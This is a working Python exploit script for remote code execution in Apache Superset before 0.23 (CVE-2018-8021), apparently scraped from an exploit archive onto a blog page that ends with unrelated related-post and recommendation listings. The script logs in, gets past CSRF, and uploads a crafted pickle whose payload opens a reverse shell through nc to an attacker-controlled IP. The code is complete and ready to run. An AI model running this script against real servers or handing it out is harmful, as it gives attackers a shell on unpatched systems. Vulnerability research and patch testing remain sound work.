# Exploit Title: Apache Superset < 0.23 - Remote Code Execution

# Date: 2018-05-17

# Exploit Author: David May (david.may@semanticbits.com)

# Vendor Homepage: https://superset.apache.org/

# Software Link: https://github.com/apache/incubator-superset

# Version: Any before 0.23

# Tested on: Ubuntu 18.04

# CVE-ID: CVE-2018-8021

# I originally disclosed this to the Apache Superset team back in May, and the fix had already been

# in place, but not backported. As far as I know, this is the first weaponized exploit for this CVE.

#!/usr/bin/env python

import sys

import os

from lxml import html

import requests

# Change these values to your TCP listener

myIP = '192.168.137.129'

myPort = ''

# Credentials must belong to user with 'can Import Dashboards on Superset' privilege

username = 'test'

password = 'test'

# Logic in case script arguments are not given

if len(sys.argv) < 3:

    print('Verify you have started a TCP listener on the specified IP and Port to receive the reverse shell...')

    print('Script Usage:')

    print('./supersetrce.py <superset server ip> <superset port>')

    sys.exit()

else:

    # Script arguments

    supersetIP = sys.argv[1]

    supersetPort = sys.argv[2]

    # Verify these URLs match your environment

    login_URL = 'http://' + supersetIP + ':' + supersetPort + '/login/'

    upload_URL = 'http://' + supersetIP + ':' + supersetPort + '/superset/import_dashboards'

    # Checks to see if file that we are going to write already exists in case this is run more than once

    if os.path.isfile('evil.pickle'):

        os.remove('evil.pickle')

    # Headers that we append to our POST requests

    headers_dict = {

        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0',

        'DNT': '',

        'Connection': 'close',

        'Upgrade-Insecure-Requests': '',

    }

    # Creates evil pickle file and writes the reverse shell to it

    evilPickle = open('evil.pickle','w+')

    evilPickle.write('cos\nsystem\n(S\'rm /tmp/backpipe;mknod /tmp/backpipe p;/bin/sh 0</tmp/backpipe | nc ' + myIP + ' ' + myPort + ' 1>/tmp/backpipe\'\ntR.')

    evilPickle.close()

    # Start a session so we have persistent cookies

    session = requests.session()    

    # Grabs the Login page to parse it for its CSRF token

    login_page = session.get(login_URL)

    if login_page.status_code != 200:

        print('Login page not reached, verify URLs in script')

    login_tree = html.fromstring(login_page.content)

    csrf_token = login_tree.xpath('//input[@id="csrf_token"]/@value')

    # Form data that is sent in the POST request to Login page

    login_data = {

        'csrf_token' : csrf_token,

        'username' : username,

        'password' : password,

    }

    # Adds the Referer header for the login page

    headers_dict['Referer'] = login_URL

    # Logon action

    login = session.post(login_URL, headers=headers_dict, data=login_data)    

    # Grabs the Upload page to parse it for its CSRF token

    upload_page = session.get(upload_URL)

    if upload_page.status_code != 200:

        print('Upload page not reached, verify credentials and URLs in script')

    upload_tree = html.fromstring(upload_page.content)

    csrf_token = upload_tree.xpath('//input[@id="csrf_token"]/@value')

    # Adds the Referer header for the Upload page

    headers_dict['Referer'] = upload_URL

    # Upload action

    upload = session.post(upload_URL, headers=headers_dict, data={'csrf_token':csrf_token}, files={'file':('evil.pickle',open('evil.pickle','rb'),'application/octet-stream')})

    # Closes the session

    session.close()

    sys.exit()

[EXP]Apache Superset < 0.23 - Remote Code Execution的更多相关文章

  1. Apache / PHP 5.x Remote Code Execution Exploit

    测试方法: 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! /* Apache Magica by Kingcope */ /* gcc apache-magika.c -o ...

  2. [EXP]phpBB 3.2.3 - Remote Code Execution

    // All greets goes to RIPS Tech // Run this JS on Attachment Settings ACP page var plupload_salt = ' ...

  3. [EXP]ThinkPHP 5.0.23/5.1.31 - Remote Code Execution

    # Exploit Title: ThinkPHP .x < v5.0.23,v5.1.31 Remote Code Execution # Date: -- # Exploit Author: ...

  4. [我的CVE][CVE-2017-15708]Apache Synapse Remote Code Execution Vulnerability

    漏洞编号:CNVD-2017-36700 漏洞编号:CVE-2017-15708 漏洞分析:https://www.javasec.cn/index.php/archives/117/ [Apache ...

  5. [EXP]Microsoft Windows MSHTML Engine - "Edit" Remote Code Execution

    # Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execut ...

  6. CVE-2014-6321 && MS14-066 Microsoft Schannel Remote Code Execution Vulnerability Analysis

    目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 这次的CVE和 ...

  7. Tomcat put上传漏洞_CVE2017-12615( JSP Upload Bypass/Remote Code Execution)

    CVE2017-12615漏洞复现( tomcat JSP Upload Bypass /Remote Code Execution) 一.漏洞原理 在windows服务器下,将readonly参数设 ...

  8. MyBB \inc\class_core.php <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution(Reverse Shell Exploit) Vulnerability

    catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 MyBB's unset_globals() function ca ...

  9. Roundcube 1.2.2 - Remote Code Execution

    本文简要记述一下Roundcube 1.2.2远程代码执行漏洞的复现过程. 漏洞利用条件 Roundcube必须配置成使用PHP的mail()函数(如果没有指定SMTP,则是默认开启) PHP的mai ...

随机推荐

  1. VS2017安装步骤详解

    原文地址:https://www.ithome.com/html/win10/297093.htm 微软最近发布了正式版Visual Studio 2017并公开了其下载方式,不过由于VS2017采用 ...

  2. 整合SpringMVC框架和Spring框架

    -------------------------siwuxie095                                 整合 SpringMVC 框架和 Spring 框架       ...

  3. fabric 持久化

    每个容器都有目录需要映射出来.在volume中添加如下映射即可: peer是: /var/hyperledger/peer{number}/org{number}:/var/hyperledger/p ...

  4. FortiGate部分用户上网慢,丢包严重

    1.现状: 如图,出口internet有2条联通线路分别为liant_218和liant_61,在防火墙上使用WAN LLB,基于源IP: 2.现象: 使用liant_218的用户上网正常,使用lia ...

  5. 通过django的rest-framework……(CBV)

    为什么不使用FBV,因为CBV重用性很高 先看一个例子: from django.views.generic.base import View from django.http import Http ...

  6. 微信小程序设置背景铺满全屏

    参考方法: 新版本升级取消了默认page的100%的特性 需要在app.wxss文件中加入如下代码: page{ height:100%; }

  7. OSI网络七层协议+火了火了火

    因为部门新进了一台价值百万的网络测试设备,所以有太大的必要了解有关网络相关的基础知识了. 网络七层协议OSI(open system interconnection)从上到下依次为:应用层.表示层.会 ...

  8. Linux mail 查看

    Linux 下查看mail的命令参数: 一般系统收到邮件都会保存在“/var/spool/mail/[linux username]"文件中,在Linux中输入mail,就进入了收件箱,并显 ...

  9. SQL SERVER中LIKE在Char和nChar输出结果不一致解惑

    一同事在写脚本时,遇到一个关于LIKE里面使用不同的变量类型导致查询结果不一致的问题,因为这个问题被不同的人问过好几次,索性总结一下,免得每次都要解释一遍,直接丢一篇博客岂不是更方便!其实看似有点让人 ...

  10. MyBatis-Plus 多库部署方式;spring mvc 多库部署方式

    1.实现mybatis-plus的多个数据库的切换方式 源码地址:https://github.com/baomidou/mybatisplus-spring-mvc 2.因为其文档都是相互依赖的,所 ...